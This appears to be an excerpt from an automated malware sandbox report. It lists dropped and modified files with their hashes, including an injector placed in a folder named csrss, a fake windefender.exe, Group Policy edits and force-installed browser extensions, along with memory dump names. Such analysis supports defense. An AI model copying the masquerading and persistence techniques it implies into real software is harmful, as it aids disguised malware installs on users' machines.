C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
| MD5 | e77964e011d8880eae95422769249ca4 |
| SHA1 | 8e15d7c4b7812a1da6c91738c7178adf0ff3200f |
| SHA256 | f200984380d291051fc4b342641cd34e7560cadf4af41b2e02b8778f14418f50 |
| SHA512 | 8feb3dc4432ec0a87416cbc75110d59efaf6504b4de43090fc90286bd37f98fc0a5fb12878bb33ac2f6cd83252e8dfd67dd96871b4a224199c1f595d33d4cade |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 2d2eaed72f3c0bca2efca23f872b8d03 |
| SHA1 | 4eae0462f7f20c123f371e7f272fd7b85fd963b1 |
| SHA256 | 186993d12206ef03a80fb73573eaba923807cd14402bc283fa8435ceadef6d2c |
| SHA512 | 18bd0921206027ae62b42c1be782f8b680cb834d2e2e3b14911019bef0df88e7b78e03ac9181ec47fae5e8db4cf9bfd71dbc7d8fabded1127069e9ce705eddeb |
memory/2088-278-0x0000000010000000-0x0000000013BC3000-memory.dmp
memory/3044-285-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | ac4917a885cf6050b1a483e4bc4d2ea5 |
| SHA1 | b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f |
| SHA256 | e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9 |
| SHA512 | 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e551d16d266fd9a87c1546cd6a17a2a1 |
| SHA1 | 75e07eac6bd2847263ebdd3e3d6554f7e84a3fb7 |
| SHA256 | 6a56781f81b2ac1667df447ddb1f3a95841462a1feea881da7bce3f6052de3fa |
| SHA512 | 6b23550766e3bb721bdbc44d6adb3ae0109af53ab5e2ce5d2b758f9d25fa98e9e51b720348b19c5a7ee8e609e50d114695f0cae74ec50be9d37d0ddd2afb6a4a |
memory/2884-401-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1300-402-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/3076-412-0x0000000000400000-0x0000000001A40000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3d463ad4d47edae6fb5c59808b189b01 |
| SHA1 | b342815e0d5f1261fefed9e81f85933a1008f631 |
| SHA256 | 27fa5f6f659e0c953fb91452fdcba0608c13688d6b2dfc49f07d5990d2654897 |
| SHA512 | 4658ec7c7b8cb4ee0e707c21821522afe71dd74a3a7a3cb5f2edfa940dbdc21c80b5ea0facae86bc3a2d21d202273365c091c80777eb977f64a807ad277d620d |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 2eb7ddfe080963f17d1a98a206f451f3 |
| SHA1 | 3fae68ea468ffb977c253ee305d2d5dbfc2b9b3a |
| SHA256 | 8a7a3233c9f5e236aaa8955a5e5d34e70dfbda94a331b8964417504a104da305 |
| SHA512 | 4b24473e38c2672d76ce2a2963ab57fa492b7dd63a8f837654d9030511b92a2870de78584cff9b62ccf5bcfa2e5ae0e90ef7bbc82456da218d5299e940ebe3dd |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 9878501afeb3907eb77aac797e8f316c |
| SHA1 | 3ba608ba045824715f5e091fbd23526898048f29 |
| SHA256 | f4b1f3cc33472d99dbcd69f9ed991325dd60ac768a532426fc01366ba0d10b69 |
| SHA512 | ee332060e76fc393db52438935d20ab16a926797314585e6f936a36c5b30ce9c4a579a466449a3cc781fb8030891adea0ee01c1dc1f97d7f91d05260af8725e8 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 08f8a9a86de8f7cc6fafb8e2c414679e |
| SHA1 | a2638a3a83ac547a87bece9efdac65cc32a1f2b7 |
| SHA256 | 9a98e1d84f3100cb65885ef765a83abd14527275dd28c2eab942dfb1ed8eb65f |
| SHA512 | f78420f6841db879d2a9d21d6f83035e2c196ed224fea825459a077539ad6824120932d658627b5b8a3f976f72683c3133b0cd2401bb8cefb278f994f9b98409 |
memory/2884-518-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1300-529-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | ac916d15974261d0ce21c8fc71620bf7 |
| SHA1 | 6e64cd2c69ee374cfcd9999f13fd908042c52469 |
| SHA256 | c241b8dcd3d5bbb2e8dc956cdf346f080e4c69bc8ecd1bc5ed01cd7cf1641451 |
| SHA512 | 501e1116349bb290b0ab1a60a4ea49e5cee18b86d21399be11eef748d2d4d1a96534db5ac4db7867b8424fd0f8c73ef7c139043003531da81af4e24dd66ea8b2 |
memory/2172-564-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\opera_package
| MD5 | 5014156e9ffbb75d1a8d5fc09fabdc42 |
| SHA1 | 6968d1b5cec3039e53bbbedeee22e2d43d94c771 |
| SHA256 | 7a01e11e1830ba3c154e5a6c383da15938b1e48f89a2fe4045cdd260924b6802 |
| SHA512 | bfc5c44881d0fa7bcbccfd530d874fa624adec50e1a16063a72de12876d2db10ca5edd6fa841ea63e9deca3ff2adf54065f50719fe051d41de92bb68edba4016 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\additional_file0.tmp
| MD5 | 15d8c8f36cef095a67d156969ecdb896 |
| SHA1 | a1435deb5866cd341c09e56b65cdda33620fcc95 |
| SHA256 | 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8 |
| SHA512 | d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a |
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
| MD5 | 976bc8e5fe65f9bb56831e20f1747150 |
| SHA1 | f9e7f5628aaaabed9939ef055540e24590a9ccfb |
| SHA256 | f53c916ccf3d24d6793227283de2db0f6cc98a2275413851807cc080643d21a0 |
| SHA512 | 2858e7e08418b170b21b599afb02236d0480d35a5605de142f10976489e01daf2ad80df0f09c2eb38bc5a971336d1f6aa9909c520bcdb18e9c9a8e903379dcd9 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbghelp.dll
| MD5 | 544255258f9d45b4608ccfd27a4ed1dd |
| SHA1 | 571e30ceb9c977817b5bbac306366ae59f773497 |
| SHA256 | 3b02fc85602e83059f611c658e3cad6bc59c3c51214d4fe7e31f3ac31388dd68 |
| SHA512 | 2093da881fa90eec2b90d1ca6eaaff608fe16ac612571a7fd5ed94dd5f7ff7e5c1e8c862bab0a228850829527886473e3942abd23a81d10cab8f9baad2cc7664 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbgcore.dll
| MD5 | 9ebb919b96f6f94e1be4cdc6913ef629 |
| SHA1 | 31e99ac4fba516f82b36bd81784e8d518b32f9df |
| SHA256 | fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119 |
| SHA512 | a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700 |
C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/3076-649-0x0000000000400000-0x0000000001A40000-memory.dmp
memory/2172-674-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1424-676-0x0000000000400000-0x00000000008AD000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1072-686-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-698-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1424-701-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2172-742-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1460-743-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-750-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/244-758-0x0000000010000000-0x0000000013BC3000-memory.dmp
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/1460-784-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-783-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9e74ed00e926c59becad69a5caa346a |
| SHA1 | de60ae4e1749a56690f1d774ccb4ab725005a3c4 |
| SHA256 | 7dbdeb170717f76e81ab1142469c05994e25c9a17bc21b503e9d6484a70210e2 |
| SHA512 | 5c74c472f5d356a6c83f4656362034a11f02f57dc27ac14aab914e0567495ffb0d45b5f348734e9ab9c1f5c9374a39f99111312bb29b4a55394e8aaf13f32b80 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 8679b2ab6610d033f5c98beb5063989a |
| SHA1 | 44dbd2010f4821d0134fbafb57ee9465d12150f3 |
| SHA256 | b56bf1ef6e30f1f0e7109627e8859a8270e7c2d290b0d5183d083c7ed0c083a8 |
| SHA512 | f3c4200896b69c1dc9c4db2e5bab7a4bddc9c253eee7aa4e63b8f6b337a6a5e9feaf03cb86455230e91509ddb29a6b78d1f7139111690e9b1b3ef0a3c246bea6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | ef6984033cbe2419e353faffb46dc4cc |
| SHA1 | 0e938ec38d1780bb65af4fb846af4c5246ec656b |
| SHA256 | 8ce3d7b37e0253f2299825378a133f8c5c98d41e34523eae48fb84aaf2d2c134 |
| SHA512 | c80c500d4c49b5cc34510843f9b709c6eced8f5a9cc98d95c7be0146889c0d2fe6231302a72b0f3445f512973aa30c11d61477ae1303cc2cd5f3f4f629dc7f90 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
| MD5 | 21d1dbcbff005cc27d3ee4c8b5d40e15 |
| SHA1 | 4ba78901a2cc94f8e41e3f4ed908eff46751baf6 |
| SHA256 | 65f3e18ba77d36a9dc6a26a7085fa68d2a5afeafe6a400dee5f6aecb06f5fcf5 |
| SHA512 | 14dbaeb2bc4a14751c79203988f7897fccfb9a8261bb5908ec7a231a9b49a5a5612a2e3b6e52d4755299941018466c8f3020c6b7669d3aa362f177c87a0270e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | db3aec3ef659a65b6676644336d0f8c4 |
| SHA1 | 83c05ee25a84c6ff136694f19b4bbd0ee34bd997 |
| SHA256 | 4231e2fd0fcad36fda58f669884b508bdb308a45becc9821c181f3a18aed48de |
| SHA512 | 73802b69af66d2c4ebd2cf401e7ff17f2d632307ea7253bf5b8a673c8e90c254abb01ad739a14b2a5cc8e9358e6beae59abc92c127bd2447a24eed43a6ba19af |
C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe
| MD5 | 31fdaf5dfa78088a896093d9ff996ee0 |
| SHA1 | ae94f8a18af6de6be9ef3cba0e77d541b6455a00 |
| SHA256 | 657aaac97ab7af616faa4836e62b708448e44f157ff5fa221d8ef6d889930789 |
| SHA512 | 5afc90626d59d1639fe9b014cccaf8d88fbdbdb4be64add8c35fd14f993b8571cae343c7fda4d535c0968ab790530db9df18a1b229fb17b7d793531a3c42d006 |